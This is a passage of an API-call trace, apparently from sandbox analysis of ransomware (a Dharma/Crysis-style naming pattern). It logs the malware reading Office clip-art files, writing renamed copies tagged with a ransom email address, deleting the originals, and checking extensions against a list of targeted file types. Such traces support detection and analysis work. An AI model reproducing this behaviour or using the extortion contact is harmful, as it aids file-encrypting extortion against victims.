office\\root\\clipart\\pub60cor\\j0152894.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.708] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.708] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0196.709] GetLastError () returned 0x0 [0196.709] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x2c54, lpOverlapped=0x0) returned 1 [0196.719] WriteFile (in: hFile=0x33c, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2c60, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2c60, lpOverlapped=0x0) returned 1 [0196.721] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.721] WriteFile (in: hFile=0x33c, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0196.721] SetEndOfFile (hFile=0x33c) returned 1 [0196.721] CloseHandle (hObject=0x33c) returned 1 [0196.721] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.721] SetEndOfFile (hFile=0x3a0) returned 1 [0196.722] CloseHandle (hObject=0x3a0) returned 1 [0196.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.722] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf")) returned 1 [0196.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.723] lstrlenW (lpString=".doc") returned 4 [0196.723] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.723] lstrlenW (lpString=".docx") returned 5 [0196.723] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0196.723] lstrlenW (lpString=".pdf") returned 4 [0196.723] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.723] lstrlenW (lpString=".xls") returned 4 [0196.723] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.723] lstrlenW (lpString=".xlsx") returned 5 [0196.723] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0196.723] lstrlenW (lpString=".ppt") returned 4 [0196.723] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.723] lstrlenW (lpString=".zip") returned 4 [0196.723] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.723] lstrlenW (lpString=".rar") returned 4 [0196.723] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.723] lstrlenW (lpString=".bz2") returned 4 [0196.724] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.724] lstrlenW (lpString=".7z") returned 3 [0196.724] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.724] lstrlenW (lpString=".dbf") returned 4 [0196.724] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.724] lstrlenW (lpString=".1cd") returned 4 [0196.724] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.724] lstrlenW (lpString=".jpg") returned 4 [0196.724] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.724] lstrlenW (lpString=".doc") returned 4 [0196.724] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.724] lstrlenW (lpString=".docx") returned 5 [0196.724] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0196.724] lstrlenW (lpString=".pdf") returned 4 [0196.724] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.724] lstrlenW (lpString=".xls") returned 4 [0196.724] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.724] lstrlenW (lpString=".xlsx") returned 5 [0196.724] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0196.724] lstrlenW (lpString=".ppt") returned 4 [0196.724] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.725] lstrlenW (lpString=".zip") returned 4 [0196.725] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.725] lstrlenW (lpString=".rar") returned 4 [0196.725] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.725] lstrlenW (lpString=".bz2") returned 4 [0196.725] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.725] lstrlenW (lpString=".7z") returned 3 [0196.725] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.725] lstrlenW (lpString=".dbf") returned 4 [0196.725] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.725] lstrlenW (lpString=".1cd") returned 4 [0196.725] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF") returned 68 [0196.725] lstrlenW (lpString=".jpg") returned 4 [0196.725] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.725] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0196.725] lstrlenW (lpString="J0153047.WMF") returned 12 [0196.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.726] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=33068) returned 1 [0196.726] CloseHandle (hObject=0x3a0) returned 1 [0196.726] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf")) returned 0x220 [0196.726] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.727] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.727] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0196.727] GetLastError () returned 0x0 [0196.728] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x812c, lpOverlapped=0x0) returned 1 [0196.738] WriteFile (in: hFile=0x33c, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x8130, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x8130, lpOverlapped=0x0) returned 1 [0196.740] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.740] WriteFile (in: hFile=0x33c, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0196.740] SetEndOfFile (hFile=0x33c) returned 1 [0196.740] CloseHandle (hObject=0x33c) returned 1 [0196.740] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.740] SetEndOfFile (hFile=0x3a0) returned 1 [0196.741] CloseHandle (hObject=0x3a0) returned 1 [0196.741] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.742] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf")) returned 1 [0196.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.742] lstrlenW (lpString=".doc") returned 4 [0196.742] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.742] lstrlenW (lpString=".docx") returned 5 [0196.742] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0196.742] lstrlenW (lpString=".pdf") returned 4 [0196.742] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.742] lstrlenW (lpString=".xls") returned 4 [0196.742] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.742] lstrlenW (lpString=".xlsx") returned 5 [0196.742] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0196.742] lstrlenW (lpString=".ppt") returned 4 [0196.742] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.743] lstrlenW (lpString=".zip") returned 4 [0196.743] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.743] lstrlenW (lpString=".rar") returned 4 [0196.743] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.743] lstrlenW (lpString=".bz2") returned 4 [0196.743] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.743] lstrlenW (lpString=".7z") returned 3 [0196.743] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.743] lstrlenW (lpString=".dbf") returned 4 [0196.743] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.743] lstrlenW (lpString=".1cd") returned 4 [0196.743] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.743] lstrlenW (lpString=".jpg") returned 4 [0196.743] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.743] lstrlenW (lpString=".doc") returned 4 [0196.743] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.743] lstrlenW (lpString=".docx") returned 5 [0196.743] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0196.743] lstrlenW (lpString=".pdf") returned 4 [0196.743] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.743] lstrlenW (lpString=".xls") returned 4 [0196.743] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.743] lstrlenW (lpString=".xlsx") returned 5 [0196.744] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0196.744] lstrlenW (lpString=".ppt") returned 4 [0196.744] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.744] lstrlenW (lpString=".zip") returned 4 [0196.744] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.744] lstrlenW (lpString=".rar") returned 4 [0196.744] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.744] lstrlenW (lpString=".bz2") returned 4 [0196.744] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.744] lstrlenW (lpString=".7z") returned 3 [0196.744] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.744] lstrlenW (lpString=".dbf") returned 4 [0196.744] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.744] lstrlenW (lpString=".1cd") returned 4 [0196.744] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF") returned 68 [0196.744] lstrlenW (lpString=".jpg") returned 4 [0196.744] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.744] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0196.744] lstrlenW (lpString="J0153089.WMF") returned 12 [0196.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.745] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=7848) returned 1 [0196.745] CloseHandle (hObject=0x3a0) returned 1 [0196.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf")) returned 0x220 [0196.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.746] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.746] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0196.747] GetLastError () returned 0x0 [0196.747] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1ea8, lpOverlapped=0x0) returned 1 [0196.775] WriteFile (in: hFile=0x33c, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1eb0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1eb0, lpOverlapped=0x0) returned 1 [0196.776] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.776] WriteFile (in: hFile=0x33c, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0196.777] SetEndOfFile (hFile=0x33c) returned 1 [0196.777] CloseHandle (hObject=0x33c) returned 1 [0196.777] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.777] SetEndOfFile (hFile=0x3a0) returned 1 [0196.778] CloseHandle (hObject=0x3a0) returned 1 [0196.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.072] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf")) returned 1 [0197.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.072] lstrlenW (lpString=".doc") returned 4 [0197.073] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.073] lstrlenW (lpString=".docx") returned 5 [0197.073] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0197.073] lstrlenW (lpString=".pdf") returned 4 [0197.073] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.073] lstrlenW (lpString=".xls") returned 4 [0197.073] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.073] lstrlenW (lpString=".xlsx") returned 5 [0197.073] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0197.073] lstrlenW (lpString=".ppt") returned 4 [0197.073] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.073] lstrlenW (lpString=".zip") returned 4 [0197.073] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.073] lstrlenW (lpString=".rar") returned 4 [0197.073] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.073] lstrlenW (lpString=".bz2") returned 4 [0197.073] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.073] lstrlenW (lpString=".7z") returned 3 [0197.073] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.073] lstrlenW (lpString=".dbf") returned 4 [0197.073] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.073] lstrlenW (lpString=".1cd") returned 4 [0197.073] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.073] lstrlenW (lpString=".jpg") returned 4 [0197.073] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.074] lstrlenW (lpString=".doc") returned 4 [0197.074] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.074] lstrlenW (lpString=".docx") returned 5 [0197.074] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0197.074] lstrlenW (lpString=".pdf") returned 4 [0197.074] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.074] lstrlenW (lpString=".xls") returned 4 [0197.074] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.074] lstrlenW (lpString=".xlsx") returned 5 [0197.074] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0197.074] lstrlenW (lpString=".ppt") returned 4 [0197.074] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.074] lstrlenW (lpString=".zip") returned 4 [0197.074] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.074] lstrlenW (lpString=".rar") returned 4 [0197.074] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.074] lstrlenW (lpString=".bz2") returned 4 [0197.074] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.074] lstrlenW (lpString=".7z") returned 3 [0197.074] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.074] lstrlenW (lpString=".dbf") returned 4 [0197.074] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.074] lstrlenW (lpString=".1cd") returned 4 [0197.074] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF") returned 68 [0197.075] lstrlenW (lpString=".jpg") returned 4 [0197.075] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.075] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0197.075] lstrlenW (lpString="J0153398.WMF") returned 12 [0197.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.075] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=17508) returned 1 [0197.076] CloseHandle (hObject=0x358) returned 1 [0197.076] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf")) returned 0x220 [0197.076] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, 